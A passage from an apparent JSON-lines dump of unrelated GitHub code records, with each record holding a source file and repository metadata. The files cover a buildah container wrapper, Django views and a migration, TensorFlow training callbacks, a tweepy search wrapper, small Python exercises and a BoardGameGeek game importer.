*args, **options)\n\n def copy(self, source, *args, **options):\n return copy(self.id, source, *args, **options)\n\n @_contextlib.contextmanager\n def mount(self, **options):\n yield list(mount(self.id, **options).values())[0]\n umount(self.id)\n\n def commit(self, image_name, **options):\n return commit(self.id, image_name, **options)\n\n def run(self, *args, **options):\n return run(self.id, *args, **options)\n\n\ndef rmi(name_or_id, **kwargs):\n return _buildah(\"rmi\", name_or_id, _capture_output=True, **kwargs)\n\n\ndef rm(name_or_id, **kwargs):\n return _buildah(\"rm\", name_or_id, _capture_output=True, **kwargs)\n\n\ndef images(*args, **options):\n return _buildah(\n \"images\",\n *args,\n _list=True,\n _json=True,\n _wrapper=lambda x: Image(x[\"id\"]),\n **options\n )\n\n\ndef containers(*args, **options):\n return _buildah(\n \"containers\",\n *args,\n _list=True,\n _json=True,\n _wrapper=lambda x: Container(x[\"id\"]),\n **options\n )\n\n\ndef inspect(image_or_container, **options):\n try:\n info = _json.loads(\n _buildah(\n \"inspect\",\n image_or_container,\n _capture_output=True,\n **options\n ),\n )\n if info.get(\"Config\"):\n info[\"Config\"] = _json.loads(info[\"Config\"])\n return info\n except BuildahError as e:\n raise BuildahNotFound(\n \"Could not find container or image {!r}\".format(image_or_container),\n ) from e\n\n\ndef from_(base, _wrapper=Container, **options):\n f = _tempfile.NamedTemporaryFile(mode=\"w+t\")\n _result = _buildah(\n \"from\",\n base,\n _capture_output=True,\n cidfile=f.name,\n _wrapper=None,\n **options,\n )\n return _wrapper(str(f.read()))\n\n\ndef commit(name_or_id, image_name, **options):\n return _buildah(\n \"commit\",\n name_or_id,\n image_name,\n _wrapper=lambda _: Image(_.strip()),\n **options,\n )\n\n\ndef unshare():\n if \"BUILDAH_ISOLATION\" in _os.environ:\n return\n cmdline = open(\"/proc/self/cmdline\", \"rt\").read().split(\"\\0\")\n cmdline = [\"buildah\"] + _optify(global_options) + [\"unshare\"] + cmdline\n _os.execvp(\"buildah\", cmdline)\n\n\ndef run(name_or_id, cmd, **options):\n if isinstance(cmd, str):\n cmd = [\"sh\", \"-c\", cmd]\n\n return _buildah(\"run\", name_or_id, *cmd, **options)\n\n\ndef copy(name_or_id, *args, **options):\n return _buildah(\"copy\", name_or_id, *args, _capture_output=True, **options)\n\n\ndef info():\n return _buildah(\"info\", _json=True, _json_flag=False)\n\n\ndef mount(*names_or_ids, **options):\n output = _buildah(\"mount\", *names_or_ids, _capture_output=True, **options)\n output = output.strip()\n\n if not output:\n return {}\n\n if len(names_or_ids) > 1 or not names_or_ids:\n return dict(_.split(\" \") for _ in output.split(\"\\n\"))\n return {names_or_ids[0]: output}\n\n\ndef umount(*names_or_ids, **options):\n output = _buildah(\"umount\", *names_or_ids, _capture_output=True, **options)\n output = output.strip()\n return output.split(\"\\n\")\n\n\ndef add(name_or_id, *args, **options):\n return _buildah(\"add\", name_or_id, *args, _capture_output=True, **options)\n\n\ndef _shlex_join(l):\n return \" \".join(_shlex.quote(_) for _ in l)\n\n\ndef config(name_or_id, **options):\n def list_writer(x):\n return [f\"{k}={v}\" if v is not None else f\"{k}-\" for k, v in x.items()]\n\n def mapping_writer(x):\n return [f\"{k}={v}\" if v is not None else f\"{k}-\" for k, v in x.items()]\n\n writer = {\n # Even though entrypoint and cmd are output in `inspect` as lists\n # One supports accepting a json array, the other only strings that\n # are then kinda `shlex.split` into an array again.\n # In order to prevent confusion, we justr decide that the only valid\n # representation for is is arrays, we convert the input accordingly\n # and as of now, do not need to do anything about the output since\n # that is arrays already in both cases.\n \"entrypoint\": _json.dumps,\n \"cmd\": _shlex_join,\n # I know a \"key=value\" string is even the official interface via `putenv`,\n # but in my head these are mappings and so my head always hurts when I\n # have to force it into this weird mode, so just handle them all as dicts\n \"env\": mapping_writer,\n \"label\": mapping_writer,\n \"annotation\": mapping_writer,\n }\n for key, value in options.items():\n if key not in writer:\n continue\n options[key] = writer[key](value)\n return _buildah(\"config\", name_or_id, **options)\n\n\ndef pull(name, **options):\n return _buildah(\"pull\", name, quiet=True, _wrapper=lambda x: Image(x.strip()), **options)\n\n\ndef push(name_or_id, destination, **options):\n return _buildah(\n \"push\",\n name_or_id,\n destination,\n quiet=True,\n **options,\n )\n\n\ndef tag(name_or_id, *aliases, **options):\n return _buildah(\"tag\", name_or_id, *aliases, **options)\n","repo_name":"wontfix-org/python-buildah","sub_path":"buildah.py","file_name":"buildah.py","file_ext":"py","file_size_in_byte":12562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17690976764","text":"from rest_framework import viewsets\nfrom rest_framework import permissions\nfrom rest_framework.pagination import PageNumberPagination\nfrom rest_framework.decorators import action\n\nfrom recipe.serializers import IngredientSerializers, GroupSerializers, RecipeListSerializers, RecipeDetailSerializers\nfrom recipe.models import Ingredient, Group, Recipe\n\n\nclass RecipeViewPagination(PageNumberPagination):\n page_size = 500\n page_size_query_param = 'page_size'\n\n\nclass IngredientViewSet(viewsets.ModelViewSet):\n queryset = Ingredient.objects.all().order_by('name')\n serializer_class = IngredientSerializers\n\n\nclass GroupViewSet(viewsets.ModelViewSet):\n queryset = Group.objects.all().order_by('id')\n serializer_class = GroupSerializers\n\n\nclass RecipeViewSet(viewsets.ModelViewSet):\n pagination_class = RecipeViewPagination\n\n def get_serializer_class(self):\n if self.action == 'retrieve':\n return RecipeDetailSerializers\n return RecipeListSerializers\n\n def get_queryset(self):\n if self.action == 'retrieve':\n return Recipe.objects.all()\n\n query_string = self.request.query_params.get(\"query_string\", False)\n min_num_of_ingredients = self.request.query_params.get(\"num\", 4)\n if(not query_string):\n return Recipe.objects.all()\n print(query_string)\n return Recipe.objects.get_recipes(query_string, min_num_of_ingredients)\n","repo_name":"anil-allipilli/WhatCanICook","sub_path":"recipe/viewsets.py","file_name":"viewsets.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5378036991","text":"#generator is an iterator(which repeat things in loop) which give us only vlaue at a time not while loop give all value at one time by iterating\n# but generator give one by one as we typr __next__() and then another with another next\n#we can use this things if there are millions of file and we dont want all of them to come our system we will set generator on how to come and will call it\n# one by one using next(). Yield is an generator used instead of return. string is iterable and int are not.\ndef gen(n):\n for i in range(n):\n yield i\nq=gen(5)\nprint(q.__next__())\nprint(q.__next__())\n#quiz\n\ndef factorial(a):\n if a==0 or a==1:\n return 1\n sum=a\n sum=sum*(factorial(a-1))\n return sum\n\ndef gen_fact(n):\n for i in range(n):\n yield print(factorial(i))\ng=gen_fact(10)\nprint(g.__next__())\nprint(g.__next__())\nprint(g.__next__())\nprint(g.__next__())\n\n\n\n","repo_name":"Vishal-sundar-kaira/pythonProject4","sub_path":"Pythonprojects4/generatorr and iterabllee.py","file_name":"generatorr and iterabllee.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42216102113","text":"# Python std.\nimport os\nimport abc\nfrom abc import abstractmethod\n\n# 3dsr\nfrom .. import file_sys as jbfs\nfrom .. import vis2d as jbv2\nfrom .. import normals as jbn\nfrom .. import img as jbim\n\n# 3rd party\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\n\nclass Callback(abc.ABC):\n def __init__(self, period):\n self.set_period(period)\n\n @abstractmethod\n def on_epoch_end(self, epoch, force_run=False, **kwargs):\n raise NotImplementedError\n\n def get_period(self):\n return self._period\n\n def set_period(self, period):\n if not isinstance(period, int) or period < 1:\n raise Exception('\"period\" has to be integer number greater than 0.')\n self._period = period\n\n @abstractmethod\n def get_file_name(self):\n raise NotImplementedError\n\n @abstractmethod\n def set_file_name(self, fname):\n raise NotImplementedError\n\n @abstractmethod\n def add_file_name_suffix(self, suff):\n \"\"\" Adds suffix to the current file name. In case\n of file (not directory), it adds it before the extension.\n\n Args:\n suff (str): Suffix to add.\n \"\"\"\n raise NotImplementedError\n\n\nclass HistorySaver(Callback):\n \"\"\" Callback for svaing the training history to .npz file.\n \"\"\"\n\n def __init__(self, file_name, period=10):\n \"\"\"\n Args:\n file_name (str): Absolute path to output history file.\n period (int): Interval between saving current history in epochs.\n \"\"\"\n if not os.path.exists(os.path.dirname(file_name)):\n raise Exception('The directory \"{d}\" intended for saving '\n 'the learning history does not exist.'.\n format(d=os.path.dirname(file_name)))\n\n super(HistorySaver, self).__init__(period)\n\n self._fname_base = jbfs.unique_file_name(file_name)\n self._curr_fname = None\n\n def on_epoch_end(self, ep, force_run=False, **kwargs):\n if ep % self._period == 0 or force_run:\n history = kwargs['history']\n\n # Store last file name.\n old_file_name = self._curr_fname\n\n # Generate new file name.\n self._curr_fname = self._fname_base[:-4] + \\\n '_epoch_{:03d}'.format(ep) + '.npz'\n self._curr_fname = jbfs.unique_file_name(self._curr_fname)\n\n # Save.\n np.savez_compressed(self._curr_fname, **history)\n\n # Remove old file.\n if old_file_name is not None:\n os.remove(old_file_name)\n\n def get_file_name(self):\n return self._fname_base\n\n def set_file_name(self, fn):\n self._fname_base = fn\n self._curr_fname = None\n\n def add_file_name_suffix(self, suff):\n fn = self.get_file_name()\n nam, ext = jbfs.split_name_ext(fn)\n self.set_file_name(nam + suff + '.' + ext)\n\n\nclass WeightsSaverTF(Callback):\n \"\"\" Callback for saving the current weights each `period` epochs. TF's\n `tf.Train.Saver` is used for this purpose.\n \"\"\"\n def __init__(self, file_name, sess,\n period=10, keep_chkpt_every_n_hours=10000.0,\n max_to_keep=1):\n \"\"\"\n Args:\n file_name (str): Absolute path to checkpoint file.\n sess (tf.Session): TF session.\n period (int): Interval between saves, in epochs.\n keep_chkpt_every_n_hours (float): See `tf.train.Saver`.\n max_to_keep (int): See `tf.train.Saver`.\n \"\"\"\n super(WeightsSaverTF, self).__init__(period)\n\n self._fname = file_name\n self._sess = sess\n self._saver = tf.train.Saver(\n keep_checkpoint_every_n_hours=keep_chkpt_every_n_hours,\n max_to_keep=max_to_keep)\n\n def on_epoch_end(self, ep, force_run=False, **kwargs):\n if ep % self._period == 0 or force_run:\n self._saver.save(self._sess, self._fname, global_step=ep)\n\n def get_file_name(self):\n return self._fname\n\n def set_file_name(self, fn):\n self._fname = fn\n\n def add_file_name_suffix(self, suff):\n fn = self.get_file_name()\n nam, ext = jbfs.split_name_ext(fn)\n self.set_file_name(nam + suff + '.' + ext)\n\n\nclass PlotsSaver(Callback):\n \"\"\" Saves the plots of given learning curves. It only saves the plots once\n in `period` epochs. It saves 3 same plots but with different y axis\n ranges to increase the chance of getting the visuallu pleasing result.\n Each time it saves the plots it overwrites the old plots. Each of these\n plots add the string \"_n\" to the end of the name (where n is integer\n number).\n \"\"\"\n\n # Default visualization properties used in case of missing values.\n default_clr = 'k'\n default_line_style = '-'\n default_line_width = 1.0\n\n def __init__(self, fname, period=10, names=None, colors=None,\n line_styles=None, xlab='epochs', ylab_data='E',\n ylab_lr='learning rate', logy_lr=True, title='',\n legend=True, legend_loc='best', grid=True,\n xlim=None, ylim_data=None, ylim_lr=None,\n font_size=12):\n \"\"\"\n Args:\n fname (str): Absolute path to plot.\n period (int): Interval between saves in epochs.\n names (dict): key - variable name, value a string to display.\n colors (dict): {'varname': 'color_code'}\n line_styles (dict): {'varname': 'style_code'}\n xlab (str): x-axis kabel.\n ylab_data (str): y-axis flor data (left)\n ylab_lr (str): y-axis for learning rate (right)\n logy_lr (bool): Whether to display y-axis in log scale.\n title (str): Title.\n legend (bool): Whether to display legend.\n legend_loc (int or str): See `pytplot.legend`\n grid (bool): Show grid?\n xlim (tuple of float): Limits of x axis.\n ylim_data (tuple of float): Limits of data y axis.\n ylim_lr (tuple of float): Limits of lr y axis.\n font_size (int): Font size.\n \"\"\"\n\n # Init parent.\n super(PlotsSaver, self).__init__(period)\n\n if not os.path.exists(os.path.dirname(fname)):\n raise Exception('The directory \"{d}\" intended for saving '\n 'the plots does not exist.'.\n format(d=os.path.dirname(fname)))\n if period < 1:\n raise Exception('The period value must be greater than 0.')\n\n # Save parameters.\n self._fname = fname\n\n # Save vis. properties.\n self._names = names\n self._colors = colors\n self._line_styles = line_styles\n self._xlab = xlab\n self._ylab_data = ylab_data\n self._ylab_lr = ylab_lr\n self._logy_lr = logy_lr\n self._title = title\n self._legend = legend\n self._legend_loc = legend_loc\n self._grid = grid\n self._xlim = xlim\n self._ylim_dat = ylim_data\n self._ylim_lr = ylim_lr\n self._font_size = font_size\n\n # Check file name and possibly create output dir.\n fpath_base = os.path.dirname(fname)\n if not os.path.exists(fpath_base):\n print('WARNING: Output plot file path {} does not exist, '\n 'attempting to create it.'.format(fpath_base))\n jbfs.make_dir(fpath_base)\n\n def on_epoch_end(self, ep, force_run=False, **kwargs):\n data = kwargs['history']\n\n if ep % self._period == 0 or force_run:\n # keys = data.keys()\n keys = self._names.keys()\n\n # If names were not provided, use data keys.\n names = self._names if self._names is not None \\\n else {k: k for k in keys}\n\n # Get other available vis. properties given data keys.\n colors = {k: self._colors.get(k, PlotsSaver.default_clr)\n for k in keys}\n line_styles = {k: self._line_styles.\n get(k, PlotsSaver.default_line_style) for k in keys}\n line_widths = {k: PlotsSaver.default_line_width for k in keys}\n\n # Set y axis range for data.\n mv = np.max([np.max(data[k]) for k in keys if k != 'lr'])\n ylim_d1 = self._ylim_dat if self._ylim_dat is not None else mv\n ylim_d2 = ylim_d1 / 2\n ylim_d3 = ylim_d1 / 4\n\n # Get file names.\n fname, fext = jbfs.split_name_ext(self._fname)\n f1 = fname + '_1.' + fext\n f2 = fname + '_2.' + fext\n f3 = fname + '_3.' + fext\n\n # Plot 3 plots with different y axis range.\n for fn, yl in zip([f1, f2, f3], [ylim_d1, ylim_d2, ylim_d3]):\n jbv2.plot_tr_curves_lr(names, data, colors=colors,\n line_styles=line_styles,\n line_widths=line_widths,\n xlab=self._xlab,\n ylab_data=self._ylab_data,\n ylab_lr=self._ylab_lr,\n logy_lr=self._logy_lr,\n title=self._title,\n legend=self._legend,\n legend_loc=self._legend_loc,\n grid=self._grid,\n xlim=self._xlim,\n ylim_data=yl, ylim_lr=self._ylim_lr,\n font_size=self._font_size,\n display=False, save=True, file=fn)\n\n def get_file_name(self):\n return self._fname\n\n def set_file_name(self, fn):\n self._fname = fn\n\n def add_file_name_suffix(self, suff):\n fn = self.get_file_name()\n nam, ext = jbfs.split_name_ext(fn)\n self.set_file_name(nam + suff + '.' + ext)\n\n\nclass ReduceLROnPlateau(Callback):\n \"\"\"Reduce learning rate when a metric has stopped improving.\n \"\"\"\n def __init__(self, lr, sess, factor=0.1, patience=10,\n epsilon=1e-4, min_lr=1e-6, verbose=True):\n \"\"\"\n Args:\n lr (tf.Variable): Variable containing learning rate.\n sess (tf.Session): TF session.\n factor (float): Value by which to multiply lr.\n patience (int): How many epochs to wait before changing lr.\n epsilon (float): By how much the monitored value needs to be\n improving\n min_lr (float): Bottom threshold for lr.\n \"\"\"\n\n super(ReduceLROnPlateau, self).__init__(period=1)\n\n if factor >= 1.0:\n raise ValueError('ReduceLROnPlateau does not support a factor >= 1.0.')\n self._lr = lr\n self._sess = sess\n self._factor = factor\n self._min_lr = min_lr\n self._epsilon = epsilon\n self._patience = patience\n self._verbose = verbose\n self._wait = 0\n self._best = 0\n self._mode = 'min'\n self._monitor_op = None\n self.reset()\n\n def reset(self):\n \"\"\"Resets wait counter and cooldown counter.\n \"\"\"\n\n self._monitor_op = lambda a, b: np.less(a, b - self._epsilon)\n self._best = np.Inf\n\n self._wait = 0\n self.lr_epsilon = self._min_lr * 1e-4\n\n def on_epoch_end(self, ep, force_run=False, **kwargs):\n current = kwargs['redlr_val']\n\n if self._monitor_op(current, self._best):\n self._best = current\n self._wait = 0\n else:\n if self._wait >= self._patience:\n old_lr = self._sess.run(self._lr)\n if old_lr > self._min_lr + self.lr_epsilon:\n new_lr = old_lr * self._factor\n new_lr = max(new_lr, self._min_lr)\n self._sess.run(self._lr.assign(new_lr))\n if self._verbose:\n print('\\nEpoch {:d}: reducing learning rate '\n 'to {:.2e}.\\n'.format(ep, new_lr))\n self._wait = 0\n else:\n self._wait += 1\n\n def get_file_name(self):\n raise NotImplementedError\n\n def set_file_name(self, _):\n raise NotImplementedError\n\n def add_file_name_suffix(self, _):\n raise NotImplementedError\n\n\nclass VisNormalsSaver(Callback):\n \"\"\" Saves the visualization of predicted normals in terms of RGB images.\n \"\"\"\n def __init__(self, period, sess, path_imgs, path_normals_gt,\n path_out_imgs, inp, outp, feeddict, frame='ocv',\n normalize=True, norm_mode='global'):\n \"\"\"\n\n Args:\n path_imgs:\n path_out_imgs:\n inp:\n outp:\n feeddict:\n \"\"\"\n # Init parent.\n super(VisNormalsSaver, self).__init__(period)\n\n self._period = period\n self._sess = sess\n self._path_imgs = path_imgs\n self._path_normals_gt = path_normals_gt\n self._path_out_imgs = path_out_imgs\n self._inp = inp\n self._outp = outp\n self._feeddict = feeddict\n self._frame = frame\n self._normalize = normalize\n self._norm_mode = norm_mode\n\n jbfs.make_dir(path_out_imgs)\n\n def on_epoch_end(self, ep, force_run=False, **kwargs):\n if ep % self._period == 0 or force_run:\n files_imgs = jbfs.ls(self._path_imgs)\n files_gt = jbfs.ls(self._path_normals_gt)\n\n for fim, fgt in zip(files_imgs, files_gt):\n img = jbim.load(jbfs.jn(self._path_imgs, fim))\n if self._normalize:\n img = jbim.normalize(img, mode=self._norm_mode)\n ngt = np.load(jbfs.jn(self._path_normals_gt, fgt))['normals']\n\n fd = {k: v for k, v in self._feeddict.items()}\n fd[self._inp] = img[None]\n npred = self._sess.run(self._outp, feed_dict=fd)[0]\n\n mask = jbim.get_mask(ngt)\n img_ngt = jbn.normals2img(ngt, frame=self._frame)\n img_npred = jbn.normals2img(npred, frame=self._frame,\n mask_fgrd=mask)\n img_cmp = np.concatenate((img_ngt, img_npred), axis=1)\n plt.imsave(jbfs.jn(self._path_out_imgs, fim), img_cmp)\n\n def get_file_name(self):\n raise NotImplementedError\n\n def set_file_name(self, _):\n raise NotImplementedError\n\n def add_file_name_suffix(self, _):\n raise NotImplementedError\n","repo_name":"bednarikjan/jblib","sub_path":"deep_learning/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":14652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12367614632","text":"\"\"\"PINK FLUFFY UNICORNS\"\"\"\n\nimport colors as c\nfrom utils import ask\n\nintro = c.red + '''\nWelcome, to the pink fluffy unicorns quiz\n'''\n\ndef q1():\n answer = ask(c.red + 'Question 1: What colour are the unicorns?')\n if answer == \"pink\":\n print('And what a lovely color it is')\n return True\n print('That is incorrect')\n return False\n\ndef q2():\n answer = ask(c.red + 'Question 2: Where are they dancing?')\n if answer == \"rainbows\":\n print('Its a wonderful place to dance on, try it')\n return True\n print('That is incorrect')\n return False\n\ndef q3():\n answer = ask(c.red + 'Question 3: Please use one word to describe the texture of their magical fur?')\n if answer == \"smiles\":\n print('It feels wonderful on your skin' + c.clear)\n return True\n print('That is incorrect' + c.clear)\n return False\n\nquestions = [q1,q2,q3]\n\n\n","repo_name":"ozjack/python-1","sub_path":"old/pink.py","file_name":"pink.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10888609680","text":"import logging\nimport time\n\nimport tweepy\nfrom tweepy import Cursor, OAuthHandler\n\nfrom .config import cfg\n\n\nclass Twitter(object):\n \"\"\"Twitter wrapper.\"\"\"\n\n SLEEP_TIME = (15 * 60 + 5)\n\n def __init__(self):\n \"\"\"Initialize Twitter wrapper.\"\"\"\n auth = OAuthHandler(cfg.TWITTER_CONSUMER_KEY,\n cfg.TWITTER_CONSUMER_SECRET)\n auth.secure = True\n auth.set_access_token(cfg.TWITTER_ACCESS_TOKEN,\n cfg.TWITTER_ACCESS_SECRET)\n self.api = tweepy.API(auth)\n\n def query(self, query_args=None):\n \"\"\"Return a new TwitterQuery object.\n\n :param query_args: List of raw args to pass to the new `TwitterQuery`.\n \"\"\"\n return TwitterQuery(self, query_args)\n\n def get_country(self, name):\n \"\"\"Return a Place ID for a country search.\n\n :param name: Name of the country.\n \"\"\"\n places = self.api.geo_search(query=name, granularity='country')\n if places:\n place_id = places[0].id\n else:\n raise Exception(u'Country {} not found.'.format(name))\n return place_id\n\n\nclass TwitterQuery(object):\n \"\"\"Twitter Query chainable object.\"\"\"\n\n def __init__(self, twitter, query_args=None):\n self.twitter = twitter\n self.query_args = query_args or []\n\n def _format_hashtag(self, hashtag):\n return hashtag if hashtag[0] == '#' else '#' + hashtag\n\n def _format_mention(self, mention):\n return mention if mention[0] == '@' else '@' + mention\n\n def _limit_handled(self, cursor):\n \"\"\"Return a wrapped cursor that sleeps after a Rate Limit Response.\"\"\"\n # When cursor.next() returns StopIteration, the loop will break.\n while True:\n try:\n yield cursor.next()\n except tweepy.RateLimitError:\n logging.info('Encountered tweepy.RateLimitError, sleeping for '\n '{} seconds.'.format(self.SLEEP_TIME))\n time.sleep(self.SLEEP_TIME)\n logging.info('Done sleeping, continue results iteration.')\n\n def execute(self):\n \"\"\"Executes the query with any applied argument.\"\"\"\n if not self.query_args:\n raise Exception('Cannot execute query with no arguments.')\n query = ' '.join(self.query_args)\n print(query)\n results = Cursor(self.twitter.api.search, q=query, rpp=100)\n return self._limit_handled(results.items())\n\n def hashtags(self, hashtags):\n \"\"\"Add hashtags to the search query.\n\n :param hashtags: List of hashtags to search for.\n \"\"\"\n if hashtags:\n normalized_hashtags = [self._format_hashtag(h) for h in hashtags]\n self.query_args.append('({})'\n .format(' OR '.join(normalized_hashtags)))\n return self\n\n def mentions(self, mentions):\n \"\"\"Add user mentions to the search query.\n\n :param mentions: List of user mentions to search for.\n \"\"\"\n if mentions:\n normalized_mentions = [self._format_mention(m) for m in mentions]\n self.query_args.append('({})'\n .format(' OR '.join(normalized_mentions)))\n return self\n\n def since(self, since_dt):\n if since_dt:\n self.query_args.append(u'since:{}'\n .format(since_dt.date().isoformat()))\n return self\n\n def place(self, place):\n if place:\n self.query_args.append(u'place:{}'\n .format(self.twitter.get_country(place)))\n return self\n","repo_name":"slint/aueb-datamining","sub_path":"politically_correct/twitter.py","file_name":"twitter.py","file_ext":"py","file_size_in_byte":3659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23313275648","text":"with open('input.txt') as f:\n data = f.read().splitlines()\n\n\ncount = 0\ncount2= 0\n\n\nfor l in data:\n first, second = l.split(',')\n\n\n begin_f, last_f= first.split('-')\n\n begin_s, last_s = second.split('-')\n\n begin_f = int(begin_f)\n last_f = int(last_f)\n\n begin_s = int(begin_s)\n last_s = int(last_s)\n\n\n if (begin_f <= begin_s and last_f >= last_s) or (begin_f >= begin_s and last_f <= last_s): # challenge 1\n count += 1\n\n # check if one of them starts or ends in the middle of the other\n if (begin_f <= begin_s <= last_f or begin_f <= last_s <= last_f) or (begin_s <= begin_f <= last_s or begin_s <= last_f <= last_s): # challenge 2\n count2 += 1\n\n\nprint(\"challenge 1: \", count)\n\nprint(\"challenge 2: \", count2)\n\n\n\n","repo_name":"DiogoAlves002/Advent-of-Code-Solutions","sub_path":"day04/day04.py","file_name":"day04.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74975963290","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('workCrew', '0010_student_active'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='job',\n name='day',\n field=models.CharField(max_length=200, null=True, blank=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='job',\n name='time',\n field=models.CharField(max_length=200, null=True, blank=True),\n preserve_default=True,\n ),\n ]\n","repo_name":"AFortune/labri-scheduler","sub_path":"workCrew/migrations/0011_auto_20150505_1506.py","file_name":"0011_auto_20150505_1506.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42660503647","text":"import os\nimport tempfile\n\nimport requests\nfrom django.core import files\nfrom django.core.management.base import BaseCommand\nfrom django.db import IntegrityError, transaction\nfrom django.db.models import Q\nfrom lxml import etree\n\nfrom tabletop.models import Entity, Game, GameEntity, GameImage\nfrom tabletop.utils.bgg import GAME_DETAILS_PATH, parse_game_details\n\n\ndef save_game(details):\n game = (\n Game.objects.filter(\n Q(bgg_id=details[\"bgg_id\"]) | Q(name__iexact=details[\"name\"])\n )\n .select_related(\"image\")\n .first()\n )\n if not game:\n created = True\n with transaction.atomic():\n game = Game.objects.create(\n name=details[\"name\"],\n bgg_id=details[\"bgg_id\"],\n min_players=details[\"min_players\"],\n max_players=details[\"max_players\"],\n duration=details[\"duration\"],\n duration_type=details[\"duration_type\"],\n year_published=details[\"year_published\"],\n parent=details[\"parent\"],\n )\n for entity in details[\"entities\"]:\n GameEntity.objects.create(\n entity=Entity.objects.get_or_create(name=entity[\"name\"])[0],\n game=game,\n type=entity[\"type\"],\n )\n else:\n created = False\n if not game.bgg_id:\n game.bgg_id = details[\"bgg_id\"]\n game.save(update_fields=[\"bgg_id\"])\n if details[\"parent\"] and not game.parent:\n game.parent = details[\"parent\"]\n game.save(update_fields=[\"parent\"])\n\n if details[\"image_url\"]:\n try:\n game.image\n except Game.image.RelatedObjectDoesNotExist:\n req = requests.get(details[\"image_url\"])\n tmp = tempfile.NamedTemporaryFile()\n for chunk in req.iter_content(1024 * 8):\n if not chunk:\n break\n tmp.write(chunk)\n image = GameImage(game=game)\n try:\n image.file.save(\n \"{}.{}\".format(\n str(game.id), details[\"image_url\"].rsplit(\".\", 1)[-1]\n ),\n files.File(tmp),\n )\n except IntegrityError:\n # invalid image type\n pass\n\n return game, created\n\n\nclass Command(BaseCommand):\n help = \"Import any games in the BoardGameGeek cache\"\n\n def handle(self, *args, **options):\n if not os.path.exists(GAME_DETAILS_PATH):\n self.stdout.write(\n self.style.MIGRATE_HEADING(\n \"No cached data in {}\".format(GAME_DETAILS_PATH)\n )\n )\n return\n\n self.stdout.write(\n self.style.MIGRATE_HEADING(\n \"Beginning import from {}\".format(GAME_DETAILS_PATH)\n )\n )\n\n for root, _, file_list in os.walk(GAME_DETAILS_PATH):\n for fn in file_list:\n if not fn.endswith(\".xml\"):\n self.stdout.write(self.style.ERROR(\"Unknown file: {}\".format(fn)))\n continue\n\n self.stdout.write(\n self.style.SQL_FIELD(\"Processing file: {}\".format(fn))\n )\n\n with open(os.path.join(root, fn), \"rb\") as fp:\n tree = etree.fromstring(fp.read())\n\n details = parse_game_details(tree)\n\n game, created = save_game(details)\n if created:\n self.stdout.write(\n self.style.SQL_FIELD(\"Created \".format(game.id))\n )\n","repo_name":"dcramer/tabletop-server","sub_path":"tabletop/management/commands/import_bgg.py","file_name":"import_bgg.py","file_ext":"py","file_size_in_byte":3724,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"21724300713","text":"\nimport setuptools\n\n\n# ========================================================================= #\n# HELPER #\n# ========================================================================= #\n\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as file:\n long_description = file.read()\n\nwith open('requirements.txt', 'r') as f:\n install_requires = (req[0] for req in map(lambda x: x.split('#'), f.readlines()))\n install_requires = [req for req in map(str.strip, install_requires) if req]\n\n\n# ========================================================================= #\n# SETUP #\n# ========================================================================= #\n\n\nsetuptools.setup(\n name=\"datasmith\",\n author=\"Nathan Juraj Michlo\",\n author_email=\"NathanJMichlo@gmail.com\",\n\n version=\"0.0.1.dev1\",\n python_requires=\">=3.8\",\n packages=setuptools.find_packages(),\n\n install_requires=install_requires,\n\n url=\"https://github.com/nmichlo/datasmith\",\n description=\"Create and convert machine learning datasets!\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n\n classifiers=[\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Programming Language :: Python :: 3.10\",\n ],\n)\n\n\n# ========================================================================= #\n# END #\n# ========================================================================= #\n","repo_name":"nmichlo/datasmith","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2612902505","text":"def commission_atom(host_num,display_num,peripheral_num):\r\n host_price, display_price, peripheral_price = 25, 30, 45\r\n \r\n if host_num <= 0 or display_num <= 0 or peripheral_num <= 0 or host_num > 70 or display_num > 80 or peripheral_num > 90:\r\n return 'error', 'error'\r\n sales = host_num * host_price + display_num * display_price + peripheral_num * peripheral_price\r\n if sales <= 1000:\r\n return sales, float('%.2f' % (sales * 0.1))\r\n elif sales <= 1800:\r\n return sales, float('%.2f' % (sales * 0.15))\r\n else:\r\n return sales, float('%.2f' % (sales * 0.2))","repo_name":"huajiaohuixiang/SoftWareTest","sub_path":"back/project/ComputerSales.py","file_name":"ComputerSales.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74152582490","text":"from General_Functions import *\n\nclass Death_Screen():\n def __init__(self):\n #State\n self.just_died = True\n #Images\n self.background_image = None\n self.death_screen_animation = [[pygame.image.load(\"Images/UI/death_screen_1.png\").convert_alpha(),5],[pygame.image.load(\"Images/UI/death_screen_2.png\").convert_alpha(),5],[pygame.image.load(\"Images/UI/death_screen_3.png\").convert_alpha(),5]]\n 